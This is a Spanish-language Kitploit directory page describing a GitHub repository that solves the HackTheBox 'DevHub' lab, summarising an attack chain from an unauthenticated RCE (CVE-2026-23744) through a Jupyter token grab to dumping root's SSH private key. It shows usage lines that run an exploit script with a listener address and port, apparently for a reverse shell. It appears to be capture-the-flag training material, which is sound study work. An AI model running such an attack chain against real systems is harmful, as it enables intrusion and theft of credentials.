Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
HTB-DevHub — CVE-2026-23744 RCE + Escalada de privilegios | Kitploit
Herramientas/GitHubGitHub/thisisish/htb-devhub
Escalada de PrivilegiosReconocimientoAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubthisisish/htb-devhub

HTB-DevHub

CVE-2026-23744 RCE + Escalada de privilegios

Ver Repositorio
3hace 2 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

HackTheBox — DevHub

CVE-2026-23744 | MCPJam Inspector RCE no autenticado

Dificultad: Media
SO: Linux


Cadena de explotación

root@kitploit:~
┌─────────────────────────────────────────────────────┐
│                 CVE-2026-23744                      │
│     Unauthenticated POST → /api/mcp/connect         │
└─────────────────────┬───────────────────────────────┘
                      ↓
             Shell as mcp-dev
                      ↓
┌─────────────────────────────────────────────────────┐
│     portfwd 8888 → Jupyter Notebook Token Grab      │
└─────────────────────┬───────────────────────────────┘
                      ↓
         Browser → http://127.0.0.1:8888
                      ↓
          Shell as analyst via notebook cell
                      ↓
┌─────────────────────────────────────────────────────┐
│       cat /opt/opsmcp/server.py                     │
└─────────────────────┬───────────────────────────────┘
                      ↓
         portfwd 5000 → OPSMCP API
                      ↓
                      ↓
         /root/.ssh/id_rsa dumped
                      ↓
┌─────────────────────────────────────────────────────┐
│       ssh -i root_id_rsa [email protected]            │
│                   ROOT ★                            │
└─────────────────────────────────────────────────────┘

Archivos

ArchivoDescripción
exploit.pyExploit de RCE para CVE-2026-23744 con comprobación de vulnerabilidad
enum.pyEnumeración local — Jupyter, MCP, Python, privesc

Uso

root@kitploit:~
# Exploit
python3 exploit.py -t devhub.htb -l <your_ip> -r 4444

# Enumeration (once on box)
python3 enum.py --section all
python3 enum.py --section jupyter

Aviso legal

Solo con fines educativos y pruebas autorizadas.

Descargar herramienta